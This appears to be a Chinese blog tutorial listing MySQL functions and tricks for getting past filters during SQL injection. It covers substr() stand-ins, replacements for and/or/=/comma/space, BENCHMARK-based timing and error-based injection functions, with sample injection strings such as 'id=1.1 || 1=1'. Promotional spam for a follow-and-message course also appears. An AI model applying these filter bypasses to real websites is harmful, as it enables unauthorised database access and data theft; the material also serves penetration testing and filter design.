一、 字符串 截取函数
平时我们进行盲注时用substr()函数截取字符串,当substr()被过滤时,怎么办呢?我们可以用这些函数可以达到同样的效果
1.left(str, length)
从左边第length位开始截取字符串
用法:left(str, length),即:left(被截取字符串, 截取长度)
SELECT LEFT(‘www.baidu.com’,8)
结果为:www.baid
2.right(str,length)
从右边第length位开始截取字符串
用法:right(str, length),即:left(被截取字符串, 截取长度)
SELECT RIGHT(‘www.baidu.com’,8)
结果为:aidu.com
3.substring(str,index,len)
截取特定长度的字符串
用法:
substring(str, pos),即:substring(被截取字符串, 从第几位开始截取)
substring(str, pos, length),即:substring(被截取字符串,从第几位开始截取,截取长度)
(1).从字符串的第8个字符开始读取直至结束
SELECT SUBSTRING(‘www.baidu.com’,8)
结果为:du.com
(2).从字符串的第8个字符开始,只取3个字符
SELECT SUBSTRING(‘www.baidu.com’,8,3)
结果为:du.
4.mid(str,start,length)
截取str 从start开始,截取length的长度
mid()的用法等同于substr()这里就不多赘述了
5.substring_index(str, delim, count)
按关键字进行读取
用法:substring_index(str, delim, count),即:substring_index(被截取字符串,关键字,关键字出现的次数)
感兴趣的小伙伴可以关注小编,并私信“01”即可进裙
(1).截取第二个“.”之前的所有字符
SELECT SUBSTRING_INDEX(‘www.baidu.com’, ‘.’, 2);
结果:www.baidu
2.截取倒数第二个“.”之后的所有字符
SELECT SUBSTRING_INDEX(‘www.baidu.com’, ‘.’, -2);
结果:baidu.com
3.如果关键字不存在,则返回整个字符串
SELECT SUBSTRING_INDEX(‘www.baidu.com’, ‘zkaq’, 1);
结果: www.baidu.com
substring_index()可以在布尔盲注时使用,先随便截取一个不可能的值。那么页面肯定返回正常,如:
and substring_index(database(),’qwasda’,1)=database()’
6.Locate(substr,str)
返回字符串的位置
用法1:LOCATE(substr,str)返回字符串substr中第一次出现str的位置
例:返回字符串“d”自一次出现的位置
SELECT locate(“d”,’www.baidu.com’);
结果:8
用法2:
LOCATE(substr,str,pos)返回substr 在字符串str,从pos处开始的第一次出现的位置
例:从字符串”pan.baidu.com”的第三位开始计算,返回字符“a”第一次出现的位置
SELECT locate(“a”,’pan.baidu.com’,3);
结果:6
locate()还可以判断字符串长度
select locate(‘m’,’m123456m’,15);
7.instr (substr,str)
返回字符串的位置等同于locate(),但语法相反
用法:instr(substr,str)返回字符串substr中第一次出现str的位置
例:返回字符串“d”自一次出现的位置
SELECT instr(‘www.baidu.com’,”d”);
结果:8
8.position (substr IN str)
position (substr IN str)的效果与instr(),locate()相同,但语法不同
用法:POSITION(substr IN str) 返回字符串substr中第一次出现str的位置与LOCATE(substr,str)的结果相同
例:返回字符串“d”自一次出现的位置
SELECT position(“d”in’www.baidu.com’);
结果:8
9.strcmp()
若所有的字符串均相同,则返回STRCMP(),若根据当前分类次序,第一个参数小于第二个,则返回-1,其它情况返回1
用法:
mysql> SELECT STRCMP(12345,123456);
-> -1
mysql> SELECT STRCMP(1234567,123456);
-> 1
mysql> SELECT STRCMP(123456,123456);
-> 0 二、替代逻辑 运算符
我们在注入时,用得最多的是什么?在测试是否有注入点时,经常会用到and 1=1, 如果and、等于号”=”等这些逻辑运算符被过滤无法使用时,我们是不是就此放弃了,这时候我们可以用一些特殊的符号替代
1.替代and
当and被过滤时,可以用”&&”替代
Index.php?id = 1 and 1=1等同于Index.php?id = 1 && 1=1
2.替代or
当or被过滤时,可以用”||”替代
Index.php?id = 1.1 or 1=1等同于Index.php?id = 1.1 || 1=1
3.替代异或运算符”^”
当异或运算符”^”被过滤时,可以用”XOR”替代
select 1=1 XOR 1=1等同于select 1=1 ^ 1=1
4.替代等于号”=”
等于号”=”被过滤时,可以用多种方法替代
(1)Between://在什么与什么之间
select database() between 0x61 and 0x7a;
(2)in:// mysql中in常用于where表达式中,其作用是查询某个范围内的数据
SELECT * FROM user WHERE uid IN (2,3,5)
(3)Like //模糊查询,也可以当等于号用
Index.php?id = 1.1 or 1 like 1等同于Index.php?id = 1.1 or1 like 1
(4)使用正则代替等于号
SELECT ‘Hern’ REGEXP ‘[0-9]’;
Rlike === regexp
REGEXP等同于RLIKE
5.替代逗号”,”
union select 1,2,3 => union select * from (select 1)a join (select 2)b join (select 3)c;
6.替代空格
%20 %09 %0a %0b %0c %0d %a0 /**/ tab/
%a0 这个不会被php的\s进行匹配
/*!/ 内敛注释
# 这个也可以用来做分隔 挺有意思
7.替代NULL
\N => null
select *from duomi_admin where id=\N
三、一些小技巧
1.替代sleep()
BENCHMARK(100000,SHA1(‘1’)), 1
BENCHMARK函数是指执行某函数的次数,次数多时能够达到与sleep函数相同的效果
2.函数名和括号之间可以加入特殊字符
concat/**/()
version ()
3.花式报错注入
Floor()
Updatexml() //5.1.5以上才能使用
Extractvalue() //5.1.5以上才能使用
Exp() //5.5.5后可以用
Name_const
geometrycollection(),multipoint(),Polygon(),multipolygon(),linestring(),multilinestring() 几何函数报错
4.替代ascii
Hex()
Bin()
Ord()
最后多说一句,小编是一名 python 开发工程师,这里有我自己整理了一套最新的python系统学习教程,包括从基础的python脚本到web开发、爬虫、数据分析、数据可视化、机器学习等。 想要这些资料的可以关注小编,并在后台私信小编:“01”即可领取。
